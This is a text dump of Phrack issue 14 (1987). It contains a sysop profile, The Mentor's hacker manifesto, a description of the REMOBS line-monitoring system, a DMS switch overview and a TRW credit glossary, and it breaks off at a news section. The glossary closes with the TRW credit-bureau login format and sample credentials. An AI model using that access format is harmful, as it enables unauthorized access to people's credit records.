Phrack Pro-Phile X Featuring Terminus by Taran King. . . . ..030 Apple Sectors
The Conscience of a Hacker {Reprint} by The Mentor . . . . ..017 Apple Sectors
The Reality of The Myth [REMOBS] by Taran King . . . . . . ..026 Apple Sectors
Understanding DMS Part II by Control C . . . . . . . . . . ..071 Apple Sectors
TRW Business Terminology by Control C. . . . . . . . . . . ..021 Apple Sectors
Phrack World News Special Edition #1 by Knight Lightning . ..053 Apple Sectors
Phrack World News Issue XIV/1 by Knight Lightning. . . . . ..070 Apple Sectors
Phrack World News Issue XIV/2 by Knight Lightning. . . . . ..101 Apple Sectors
I hope you enjoy it.
:Knight Lightning
______________________________________________________________________________

142
phrack14/2.txt Normal file
View file

@ -0,0 +1,142 @@
==Phrack Inc.==
Volume Two, Issue 14, Phile #2 of 9
==Phrack Pro-Phile X==
Written and Created by Taran King
5/24/87
Welcome to Phrack Pro-Phile X. Phrack Pro-Phile is created to bring
info to you, the users, about old or highly important/controversial people.
This month, we bring to you a sysop and user of past days...
Terminus
~~~~~~~~
Terminus is the sysop of NetSys Unix and, in the past, ran Metronet.
------------------------------------------------------------------------------
Personal
~~~~~~~~
Handle: Terminus
Call him: Len
Past handles: Terminal Technician
Handle origin: Terminal Technician originated because of Len's view of
himself as a hacker. Terminus was an offshoot of that
and, although it is an egotistical view, it means he has
reached the final point of being a proficient hacker.
Date of Birth: 1/10/59
Age at current date: 29 years old
Height: 5'9"
Weight: About 190 lbs.
Eye color: Hazel
Hair Color: Brown
Computers: 6800 home brew system, Apple ][, Altair S100, 2 Apple
][+es, IBM PC, IBM XT, IBM 3270, IBM AT, and 2 Altos
986es.
Sysop/Co-Sysop of: MetroNet, MegaNet, and NetSys Unix.
------------------------------------------------------------------------------
Terminus began with the 6800 home brew system which he built himself.
It was built on a STD44 bus and it had 8K of memory. He then got the Apple ][
(plain old ][) which was impressive with its cassette drive and RF modulator.
He then got an Altair S100 which he liked because it looked like a mainframe
and he also enjoyed building it. The 2 ][+es came along and he got himself a
few floppies and a hard drive. He then sold 2 of the Apples and gave away all
his software (and kept 1 Apple with a 15 meg hard drive) and got the IBM PC.
He was impressed at the time and ditched the Apple. Due to frustration from
switching from an Apple Cat to a Hayes, he sat down and wrote a hacker which
eventually turned into CodeBuster, which was, for a long time, the only good
hacker available on IBM. He then expanded and got an XT and slowly increased
his amount of storage. When the AT came out, he got rid of the PC and got the
AT and at the same time, bought the IBM 3270. After playing around with the
AT for a long time, he sold it because he needed some money so he was left
with the XT and 3270. The XT was sold to make money to buy the Altos 986 and
he sold the 3270 about 4 months ago, now leaving him with the 2 Altos 986es.
Terminus started running a bulletin board with an unmentionable board
to start with in 914 (where he met Paul Muad'Dib), and eventually got MetroNet
going. MetroNet's original purpose was to be a phreak/hack board. It was run
on an Apple ][ with 4 8" drives and 2 floppies plus a 5 meg hard drive, which
made for an impressive system. It was going really well for a while, but then
the hard drive crashed, leaving the board down for about a month and things
slowed down after that. At that time, he got a 15 meg drive, and a 1200
modem soon followed and it stayed up for about a year and a half total, at
which time Lord Digital was co-sysop. It finally went down because he moved.
MegaNet was his next system, which ran under Concurrent PC-DOS. It looked
like a public domain system, but that was camouflage. It was multi-user (2
phone lines) and it ran on the XT. That went down because he moved again
after being up for over a year. He is currently running NetSys Unix on his 2
Altos 986es which are networked. The system consists of 2 Altos 986es, an
Ethernet link, 240 megs, and 4 phone lines on a hunt, 3 of which are 1200 baud
and the final line is 2400 baud. To get on NetSys, it is just $5 a month and
it can be reached at 301-540-3659 (2400 baud), and 3658-3656 (300/1200 baud).
Terminus has never really met anyone in person from the phreak/hack
community, although he had many chances to in New York when he lived there.
He did go to a couple of Tap meetings, but doesn't remember anyone in specific
from when he went.
Len started phreaking and hacking through a friend who worked in the
phone company that told him about various things that could be done with
electronics to play with the network. He was very paranoid about boxing so he
never did anything like that (from his house anyway). He started hacking
naturally after he got a computer. His favorite system was the University of
Illinois because of its huge size and capabilities.
Some of the memorable phreak boards he was on included Plovernet,
L.O.D., Pirate 80, OSUNY, Sherwood Forest I, and Shadowland.
Terminus is an electrical engineer and he designs boards for
different minicomputers like PDP-11s, Data Generals, VAXes, and Perkin-Elmer.
He also writes some software to interface the boards that he makes. He's
pretty decent at machine language, but recently (maybe because of the Unix?
Maybe?) he's gotten into C.
------------------------------------------------------------------------------
Interests: Telecommunications (modeming, phreaking, hacking), music,
and smoking (ahem).
Terminus's Favorite Things
--------------------------
Smoking: Let's leave it at that.
Music: Hard rock and progressive jazz (he used to be a drummer).
Programming: Writing software for fun.
Most Memorable Experiences
--------------------------
Getting interviewed by the FBI in 1983 due to someone in Iowa getting busted.
The first time he discovered Alliance Teleconferencing and ran a conference.
Some People to Mention
----------------------
Krackowicz (Just a big "Thanks.")
The (414) Gizard (Sysop of Cryton Elite, thanks for giving him the phone
numbers and names to everyone on your system.)
Lord Digital (For being a good friend [Where the hell are you?].)
------------------------------------------------------------------------------
Terminus shares Tuc's views on carding and feels it's a big gap
between committing fraud and learning the network. As he got older, he got
more paranoid about things like that. He also feels that the phreak/hack
"community" has already crumbled. He also feels that the old days were
better.
------------------------------------------------------------------------------
I hope you enjoyed this file, ...And now for the regularly taken poll from all
interviewees.
Of the general population of phreaks you have met, would you consider most
phreaks, if any, to be computer geeks? No, none of the people that he hung
out with. Thank you for your time, Len.
Taran King
Sysop of Metal Shop Private
______________________________________________________________________________

79
phrack14/3.txt Normal file
View file

@ -0,0 +1,79 @@
==Phrack Inc.==
Issue XIV, File 3 of 9
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The following file is being reprinted in honor and sympathy for the many
phreaks and hackers that have been busted recently by the Secret Service. -KL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
\/\The Conscience of a Hacker/\/
by
+++The Mentor+++
Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Another one got caught today, it's all over the papers. "Teenager
Arrested in Computer Crime Scandal," "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.
But did you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker? Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
Damn underachievers. They're all alike.
I'm in junior high or high school. I've listened to teachers explain
for the fifteenth time how to reduce a fraction. I understand it. "No, Ms.
Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is
cool. It does what I want it to. If it makes a mistake, it's because I
screwed it up. Not because it doesn't like me...
Or feels threatened by me...
Or thinks I'm a smart ass...
Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.
And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
"This is it... this is where I belong..."
I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...
You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless. We've been dominated by sadists, or
ignored by the apathetic. The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.
This is our world now... the world of the electron and the switch, the
beauty of the baud. We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals. We explore... and you call us criminals. We seek
after knowledge... and you call us criminals. We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.
I am a hacker, and this is my manifesto. You may stop this
individual, but you can't stop us all... after all, we're all alike.
+++The Mentor+++
[May the members of the phreak community never forget his words -KL]
______________________________________________________________________________

104
phrack14/4.txt Normal file
View file

@ -0,0 +1,104 @@
==Phrack Inc.==
Issue XIV, File 4 of 9
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The Reality of the Myth
REMOBS
by Taran King
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
In the past, many misconceptions have been made of the legendary
REMOBS system. The term has been used and abused. It used to be known as
REMOB, rather than the proper REMOBS, which stood for Remote Observation. The
REMOBS is a REMote service OBservation System manufactured by Teltone, a
company which makes various telephone equipment peripherals.
REMOBS has a number of features. The REMOBS permits evaluation of
equipment or employee performance. It allows observation of subscriber lines,
CO, toll, and E&M trunks, repair bureaus, and operator positions. It can be
portable or set up as dedicated remote terminals. The observer console can
sample entire networks. REMOBS is compatible with all types of switching and
transmission media.
The purpose of the REMOBS system is to measure performance and
service provided to customers in an impartial and unbiased manner. By
monitoring the subscriber connections throughout the network switch, this can
be achieved. The customer experiences are recorded and statistics are derived
to provide service level indices.
REMOBS is compatible with all switching systems including Step by
Step, Crossbar, and electronic equipment. In each situation, it can observe
almost any transmission point such as subscriber lines, inter- and
intra-office trunks, toll trunks, E&M trunks, repair bureaus, commercial
offices, and operator positions. The console operators can observe by phone
line, from one location, any switch location/CO with the remote unit
installed.
The M-241 system (which includes the console and remote terminal)
observes up to 40 circuits, but can scan up to 100 lines with a remote
terminal. The terminal may observe up to 5 locations simultaneously, with a
capacity to observe 500 circuits at any one time.
The REMOBS system can observe all remote terminals at any switching
system location through the console controls, making it feasible to observe an
entire network. Remote terminals are equipped with plug-in connectors so they
can be moved routinely to observe desired locations.
The M-241 Remote Terminal: The remote terminal is located at the point of
========================== observation. It may be ordered in portable or
dedicated configuration. The remote terminal remains inactive until accessed
by the controlling console. The remote unit is 6.5" high, 22.88" wide, and
11.7" deep, arranged for relay rack mounting.
The M-242 Observer's Console: Console operators access the remote terminals
============================= through telephone lines. Access to the remotes
is limited to console operators who know the access number, timing, and four
digit security code. Additional security is available with the optional
security dialback feature. The System automatically scans observed circuits.
The first circuit to become busy is selected and held by the system until the
necessary information is secured, the operator presses the reset button, or
the calling party goes on-hook. Timing circuits automatically drop the call
100 seconds after the calling party goes off-hook or, if answer supervision is
present, 15 seconds after the called party answers. The console itself looks
very much like a cash register. Where the digits are normally, there are
places for the trunk identity, called number, stop clock, and memory. The
pushbutton controls consist of the following: power (key switch), hold
buttons, select buttons, calling party, called party, display hold, clear,
O.G. line, auto reset, reset (manual), read (stop clock operate), talk, voice
exclusion, memory, plus a standard touch-tone keypad with the A, B, C, and D
keys. There are 2 monitor jacks, a volume control and, for the primitive
lines and switches, a rotary dial next to the touch-tone keypad. The
operator's console stands 2.25" in the front and 8.25" in the back; it's
17,25" wide and 16.5" deep.
The observation system network is set up in the following manner.
The operator observer is in an observing center at the local Central Office
with the M-242 REMOBS Central Console (which looks like a telephone to the
Central Office). Through the standard telephone network, communications
occurs between the console and the remote. From the CO, through the incoming
circuitry, it goes through the connector to the M-241 REMOBS Remote Terminal
(which looks like a telephone to the access line). From there the connection
is made to the circuits to be observed including the subscribers lines,
line-finders, toll trunks, repair lines, etc.
The information provided is both visual and audible. The visual
display, showed on the panel, includes the identity of the remote terminal,
the identity of the observed circuit, the signalled digits (up to 52), the
status of the calling and called parties (on/off-hook), and the timing of the
call. The audible information (which is provided through headset or handset)
includes the call progress tones for disposition (dial tone, type of
signalling, 60 IPM, 120 IPM, ringing, answer, etc.) and voice transmission
(calling and called parties).
The REMOBS system is very much different from often-misconceived
system known as 4Tel made by Teredyne. REMOBS is very much different from the
dial-up - enter 1 code - be given instructions simplicity of the 4Tel but it
still has the legendary capabilities of listening in remotely.
If you wish to gain more information about the REMOBS system, Teltone
Corporation can be written to at 10801 - 120th Avenue N.E., Kirkland, WA 98033
or phoned at (206) 827-9626.
______________________________________________________________________________

376
phrack14/5.txt Normal file
View file

@ -0,0 +1,376 @@
==Phrack Inc.==
Issue XIV, File 5 of 9
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
|_| |_|
|_| Understanding the Digital Multiplexing System |_|
|_| Part II |_|
|_| |_|
|_| by Control C |_|
|_| |_|
|_| An Advanced Telecommunications, Inc. Production |_|
|_|_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _|_|
|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
DMS switches were first introduced in 1979. Since then it has been modified
to interface with numerous types of switches. DMS has the ability to
interface with SP-1, #5 XBar, 1ESS, 2ESS, 3ESS, 4ESS, NX1D, NX1E, TSD, SXS,
ETS4, NO. 1 EAC, NO. 2 EAX, NO. 3 EAX, TSPS, CAMA/3CL boards, Stromberg
Carlson Turret of ONI and Visual Indicators, Modified North Electric TSD for
ONI, Stomberg Carlson (CAMA operator Position - ONI/ANI), AE #31 Switchboard,
Co-located NT/AE switchboard I/C, O/G, UDC data poller of OM, DACS (Directory
Assistance Charging System), NT #144 LTD, WECO #14 LTD, WECO #16 LTD, CALRS
(Centralized Automated Loop Reporting System), Badger 612A, AE #1 and #21 LTD,
AE #30, SC #14 LTD, Lordel MITS70 line Test System, Porta System Line Test
Unit, Pulsar II IMTS, Teradyne loop test unit, and the WECO MLT 1 (Mechanized
Loop Testing System).
Common Channel Interoffice Signaling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Common Channel Interoffice Signaling (CCIS) is a way of signaling and a way of
implementing network level services. CCIS provides reliable, crystal clear
data signaling links between the network and the switching offices. The CCIS
signaling method uses transmission equipment that is separate from voice
trunks.
Common Channel Interoffice Signaling No. 6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The basis for the CCIS system is the International Consultative Committee on
Telephone and Telegraph (CCITT) No. 6 international standard, which is brought
to its fullest capacity for use in the Stored Program Control (SPC) network of
AT&T.
The CCIS6 network contains a bunch of signaling regions, each having a pair of
interconnected Signal Transfer Points (STP). The switching systems put into
CCIS6 that connect to STPs are called Serving Offices (SO).
Band Signaling (CCIS-BS) is used on trunk signaling for intertoll-type trunks
using the CCIS network.
Direct Signaling (CCIS-DS) is used for signaling between SPC switching
machines and a Network Control Point (NCP). At the present time, CCIS6 can
handle Enhanced INWATS Originating Screening Office (OSO), Calling Card
Validation (CCV), Mechanized Calling Card Service (MCCS), and Billed Number
Screening (BNS). CCIS6 is available with DMS-100/200, DMS-200, and
DMS-100/200 or DMS-200 with TOPS.
CCIS6 Diagram:
NSB ST
------------ - - - - - - - - - - -
DTC | | | ------- |
- - - DS30 | IPML | DS30 | - - - | || | |
--------| |------|- - - - - - |------|-| |---| || | |
Digital - - - | | | - - - | || | |
Trunks | | | | || | |
| | | ------- |
| | - - - - - - -|- - - -
DTC | | TM |
DIG - - - DS30 | NUC | DS30 - - - -----
--------| |------|- - - - - - |--------| |----| |
^ - - - |Network | - - - -----
CCIS \ ------------ Modem
Signaling \ |
- - - -----
AN Links--| | | CCC |
- - - -----
Channel
Bank
Acronyms:
DIG - Digital
AN - Analog
DTC - Digital Trunk Controller
MSB - Message Switch Buffer
ST - Signaling Terminal
TM - Trunk Module
NUC - Nailed-Up Connection
IPML - Inter-Peripheral Message Link
Common Channel Interoffice Signaling No. 7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Common Channel Signaling (CCS) No. 7 or CCIS7 is a CCS system based on CCITT
No. 7. CCIS7/CCS7 on the DMS switch consists of two parts: the Message
Transfer Part (MTP) and the Interim Telephone user Part. They are compatible
with DMS-100, DMS-200, DMS-100/200, and DMS-100/DMS-100/200 with TOPS.
CCIS7 can't tell the difference between banded and direct signaling. CCIS7
uses Destination/Origination Point Codes (DPC/OPC) to route back to the
switch.
CCIS7 can handle Automatic Calling Card Service (ACCS), Enhanced INWATS, Local
Area Signaling Services, and Direct Service Dialing Capabilities.
Equal Access
~~~~~~~~~~~~
The DMS-200 Access Tandem (AT) gives a traffic concentration and distribution
function for interLATA traffic originating and a distribution function for
interLATA traffic origination or terminating inside a Local Access and
Transport Area (LATA). This gives the interLATA Carrier (IC) access to more
that one end office inside the LATA. It can handle InterLATA Carrier access
codes (10xxx), 10xxx and 950-yxxx dialing, Automatic Number Identification
(ANI) on all calls, answer supervision, equal access Automatic Message
Accounting (AMA) for both originating and terminating calls, and operator
service signaling.
The DMS-100 EA gives direct and tandem switched access service inside the LATA
for originating and terminating to interLATA Carriers. It is available in the
following three ways:
Equal Access End Office (EAEO)
------------------------------
DMS-100 Equal Access End Office (EAEO) gives a direct interconnection to
interLATA Carriers' (IC) and international Carriers' (INC) Points of Presence
(POP) inside the LATA.
Access Tandem with Equal Access End Office
------------------------------------------
The DMS-200 Access Tandem (AT) when used with equal access end office (EAEO)
lets trunk tandem interconnect to ICs/INCs POP inside the LATA.
The connection of the Equal Access End Office (EAEO) to an IC/INC through the
DMS-200 Access Tandem (AT) uses what is called two-stage overlap output
pulsing which makes the time it takes to set up a call quicker. The AT uses
the digits OZZ + XXX out pulsed in the first stage to identify the IC/INC
dialed and to pick out outgoing trunk. Then a connection is established from
the IC/INC to the EAEO through the AT. The second stage digits consist of ANI
and the called numbers are passed through the DMS-200 AT at the IC/INC.
An AMA terminating record in AT&T format is produced by the DMS-200 for all
the EAEOs. A per call terminating AMA record is made for calls that get to
the stage where the trunk from the IC/INC has been seized and a "wink" has
been returned by the DMS-200 AT.
Access Tandem with a Non-Equal Access End Office
------------------------------------------------
DMS-200 AT using a non-equal access end office gives trunk tandem connection
to an IC/INC POP within the LATA. To set up a call, connection of Feature
Group B (FGB) or Feature Group C (FGC) End Office to an IC/INC through the
DMS-200 AT uses the standard Bell Central Automatic Message Accounting (CAMA)
signaling. The Access Tandem uses the XXX digits of the access code 950-YXXX
out pulsed from the FGB end office to identify the IC/INC and to connect to an
outgoing trunk.
Mechanized Calling Card Service (MCCS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The fraudulent use of calling cards, third number and collect calls and the
increasing movement to automate current operator services has directly led to
the implantation of the Mechanized Calling Card Service (MCCS) to DMS-200/TOPS
and to the remote and host Operator Centralization (OC).
MCCS uses CCIS to relay queries and responses to and from the DMS-200/TOPS.
Operator handled calling card calls and the direct entry by subscribers of
Calling Cards by DTMF (Touch-Tone) telephones are given special provisions by
the MCCS. Both the operator handling and the direct entry of calling card
calls are decreasing the size of the operators.
Billed Number Screening (BNS) gives an enhancement to the operator-handled
collect and third-number billing by using CCIS to screen a number at the
billing validation data base for billing restrictions (i.e. the third number
is a fortress). This feature naturally will reduce fraudulent use of the
collect call feature.
Common Channel Interoffice Signaling-Direct Signaling (CCIS-DS), which is
the feature that the MCCS is designed around, is used to transmit messages to
and from many possible Billing Validation Centers (BVCs). Messages
transmitted to the BVC about MCCS include the billing number and the Personal
Identification Number (PIN). In BNS the messages have the special billing
number (collect or third number). The return messages from the BVC include
validity (of the number), billing restrictions (if any), and the Revenue
Accounting Office (RAO) code.
Auxiliary Operator Services System
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The DMS-200 Auxiliary Operator Services System (AOSS) is used primarily for
Directory Assistance and the intercept needs that are not included in the TOPS
package. The AOSS is similar to TOPS and co-exists with TOPS on the DMS-200
Toll system.
Major benefits of the AOSS include: Directory Assistance is provided with a
modern environment, AOSS position administrative activities are performed by
the DMS-200 toll maintenance system, trunking savings are achieved by
combining trunking for 1+, 0+, and Directory Assistance traffic, DA services
are managed by using TOPS methods, creation of a built-in training system
which does not require additional training equipment and reduces training
costs.
Integrated Business Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Integrated Business Network (IBN) is a revenue-producing concept designed
for small and big businesses to offer modernized PBX and Centrex features.
The Operating Company can use the IBN to maintain and enhance its competitive
position on a operational DMS-100 and DMS 100/200 switches. While using the
DMS-100 switch, the Operating Company can support varying business features
along with existing local/toll traffic.
IBN services can be introduced to a Centrex-Central Office (CO) or a
Centrex-Customer Unit (CU) by additional software modules and minor hardware
enhancements.
Current IBN features include: A growing system that can handle 30,000 lines,
networking capabilities, city wide service for DMS-100 switch and remotes for
any one customer Station Message Detail Recording (SMDR), which gives IBN
customers call records. The records can be used for system analysis and
control and station charge-back. SMDR can use LAMA records (if the IBN host
has LAMA equipment), centralized attendant maintenance, and administration
functions and Direct Inward Dialing (DID).
Electronic Switched Network (ESN)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Electronic Switched Network is designed to meet the telecommunication
needs of large multi-location corporations. The ESN is made up of a SL-1 or
SL-100 Digital Business Communications System with networking features or a
DMS-100 IBN host. The SL-1 can handle from 30-5000 lines. The SL-100 and the
DMS-100 IBN hosts can hold from a few thousands to 30,000 lines.
A DMS-100 IBN or SL-100 can remotely serve many locations from the host site.
This is done by a connection through digital transmission facilities which are
set up at remote modules at the subscriber's premises.
Here are some diagrams showing the differences between normal private
telecommunications networks and ESN networks.
Normal telecommunications network
=================================
----- ------
[Phone]--| SnS | | SL-1 |-[Phone]
| PBX | | PBX |
----- ------
| |DOD/DID DOD/DID| |
| ------- ------- |
|Tie | | Tie|
|Trunk --------- Trunk|
------| Class-5 |------
----| Centrex |----
| --------- |
| |
| |
| |
----- Tie Trunk ---------
| SnS | ----------| Class-5 |
| PBX | | Centrex |
----- ---------
| |
| |
| |
| |
------- ------
[Phone]-| Small | | SL-1 |-[Phone]
| PBX | | |
------- ------
ESN Network
===========
-------- ----------
[phone]--| Remote | | SL-1 PBX |--[phone]
| Module | | ESN Main |
-------- ----------
| |
| DS-1 Facility | DS-1 Facility
| -------------- |
--------> | Local Class 5| <---------
[phone]---------| DMS-100 |
----| IBN/ESN |-------------
2W Loop MFIDP | -------------- | ESN Trunk Group
or DS-1 | | | or DS-1
| ----- ---------------
| | CSC | | Local Class 5 |
-------- ----- | DMS-100 |
| SL-100 | <--- DS-1 ----> | IBN/ESN |
-------- Facility ---------------
| |
| |
| DS-1 Facility | DS-1 Facility
| |
-------- ----------
[phone]--| Remote | | SL-1 PBX |--[phone]
| Module | | ESN Main |
-------- ----------
Specialized Common Carrier Service (SCCS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The DMS-250 Specialized Common Carrier Service (SCCS) provides the capability
of Analog to Digital (A/D) and Digital to Analog (D/A) conversions which are
necessary with analog circuits. The DMS-250 can also switch voice and data
circuits.
The DMS-250 takes either analog or digitally encoded info and by using time
slot interchange, switches it from any input port to a temporary addressed and
connected exit port. The info may or may not be converted back to analog.
Cellular Mobile Radio Service
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A cellular system consists of two main parts: a cellular switch and cell site
equipment.
Cellular Switching Systems
~~~~~~~~~~~~~~~~~~~~~~~~~~
A cellular switch performs three main functions: audio switching, cell site
control, and system administration.
The DMS switches provide three basic implementations for cellular switching:
Stand-alone, Combined, and Remote.
Stand-alone switching is done by a Mobile Telephone Exchange (MTX) which is
interfaced with one or more class 5 end offices. The connection is made by
DID/DOD trunks. Depending on the needs of the area, the MTX can be divided as
follows: MTX which serves urban areas, MTXC which handles suburban areas, and
MTXM which is used for rural areas.
Combined switching is incorporated into a DMS-100 by some hardware additions
and cellular software. Combined switching is designed to give an easy,
cost-effective way to install cellular services to an existing host.
Remote Switching is done by combining Remote Switching Center (RSC) with a
Cell Site Controller (CSC). This combination is hosted by either a
stand-alone or a combined switch. Remote Switching is designed for serving
suburban centers, remote areas, or a small community and it gives extra
flexibility for a growing system.
All of these cellular switches have the ability to balance the workload among
various cell sites. For example, if one site's workload reaches the
programmable level of congestion, calls would be routed to nearby sites that
can handle the extra calls.
Cell Site Equipment
~~~~~~~~~~~~~~~~~~~
Cell site equipment consists of a CSC and radio equipment. The CSC is
controlled by the cellular switch and it controls radio equipment and
maintenance tasks. The CSC will work on any MTX cellular switch because of
the Remote Cluster Controller (RCC).
The radio equipment consists of self-contained Radio Channel Units (RCU),
antennas, transmitter multi-couplers, and receiver combiners.
By different program software, an RCU can perform voice, control locating, and
test functions. The self contained nature allows the RCU be remotely located
to the CSC. A RCU has built-in circuitry for extended testing of the radio
part of the system.
Control C
<End of File>
<May 1987>
______________________________________________________________________________

129
phrack14/6.txt Normal file
View file

@ -0,0 +1,129 @@
==Phrack Inc.==
Issue XIV, File 6 of 9
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
TRW Business Terminology
~~~ ~~~~~~~~ ~~~~~~~~~~~
by Control C
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Term Explanation
---- -----------
Legal Legal Involvement
Collect Collection Account
Writ-Off Account Written Off
NSF Not Sufficient Funds
Lease Default Lease Default
Liens Liens
Repo Repossessed
RFC Refused Further Credit
Pays-Sol Pays Slow
Not Pay AA Not Paying as Agreed
Cia-Our-Req Cash in Advance-Our Request
Was Pastdue Account was Past Due
Was Problem Problems In the Past
CIA Cash in Advance
Adj.Bureau Adjustment Bureau
COD Cash on Delivery
COD Cusreq COD Customer Request
Adv-Trend Advertise Trend
New Owner Recent Ownership Change
Hldg-Ord Holding Orders
Secured Secured Account
Discount Discount
Improving Improving
Unr-Disc Unearned Discount Taken
X-Deduct Unauthorized Deductions
Ref Fin Chg Refused Finance Charge
Satsftry Satisfactory Account
Bond Satis Bonding Satisfactory
Prompt Pays Promptly
Exlent Acct Excellent Account
1st Sale First Sale
21 Dys Late 21 Days Late
14 Dys Late 14 Days Late
7 Dys Late 7 Days Late
Exc Disc Excessive Discount Taken
Dispute Dispute Invoice
Prod Complt Product Complaint
Consol Note Consolidation Note
Ltd.Exp Limited Experience
Note Pays By Note
Floor Plan Floor Plan Account
Trd-Acpt Pays by Trade Acceptance
Ern Disc Earned Discount Taken
Job Complet Job Completed
Unfl-Ord Unfilled Orders
Installment Installment Account
New Account New Account
Consignment Sell on Consignment
Retention Retention
Multi Locate Multiple Locations Comments not Available
ADS XXX Average Days Slow
Sold XXX Yrs Number of Years Sold
DDWA XXX Dollar-Days Weighted Average
Payment Terms
------- -----
Term Explanation
---- -----------
Net X Net Due in X Days
Net Eom Net amount due by the end of the month
Net Prx Net amount due on the 1st of the following month
N10 Prxo Net due within 10 days of the first of the following month
N10 Eom Net due within 10 days of the end of the month
X/10 N15 X Percentage discount if paid in 10 days or total amount
due in 15 days
X/15 N30 X percentage discount if paid in 15 days or total amount
due in 30 days
X/30 N45 X percentage discount if paid in 30 days or total amount
due in 45 days
X/10 Eom X percentage discount if paid in 10 days or total amount
due at the end of the month
X/15 Eom X percentage discount if paid in 15 days or total amount
due at the end of the month
X/10 Prx X percentage discount if paid in 10 days, otherwise due on
the first of the following month
X/15 Prx X percentage discount if paid in 15 days, otherwise due on
the first of the following month
X/Eom X percentage discount if paid by end of month
X/Prox X percentage discount if paid by the first of the following
month
Cs Dis Discount in return for payment before final due date.
Tr Dis Reduction of the selling price and is always available to the
customer regardless of the lateness of the payment
Special Special terms offered by seller
Contrct As stated in contract
Varied Offers several different terms
Roi Remit on receipt of invoice
D/S Draft Payable at sight
D/O Draft with order
COD Cash on Delivery
COD-Req COD at seller's request
CIA Cash in advance
CIA-Req CIA at seller's request
CWO Cash with order
NET Balance Due
Multi Customer has more than one way of paying
Note Written promise to pay at a specific time
Cash Cash only
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Login
-----
The proper format for TRW is as follows:
TCA1 RTS subcode+pw lastname firstname middleinitial...,street# streetinit
zipcode
Example: (Subscriber code is 1234567 and PW is OS5)
TCA1 RTS 1234567OS5 SMITH JOHN S...,3123 H 37923[Ctrl S][Ctrl M]
^C
______________________________________________________________________________

289
phrack14/7.txt Normal file
View file

@ -0,0 +1,289 @@
==Phrack Inc.==
Issue XIV, File 7 of 9
^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^
PWN PWN
^*^ ^*^ Phrack World News ^*^ ^*^
PWN Special Edition I PWN
^*^ ^*^
PWN Edited, Compiled, and Written PWN
^*^ by Knight Lightning ^*^
PWN PWN
^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^
Welcome to the first Phrack World News "Special Edition." In this issue we
have two parts. The first section deals with possible news stories of the
future after the weekend of June 19-21... SummerCon '87! The second section
is a presentation of acronyms that never were, but should be. All posts have
been taken from Metal Shop Private prior to its takedown in June. Posts have
been edited for this presentation.
PWN Special Edition is not a regular series and will only appear when the
author deems it necessary to release one. Please keep in mind that all
material in this file was written several weeks prior to SummerCon '87 and
therefore the events chronicled here are supposed fiction and comedy.
Thank you -KL.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Name: Phantom Phreaker
SummerCon Prank Backfires June 31, 1987
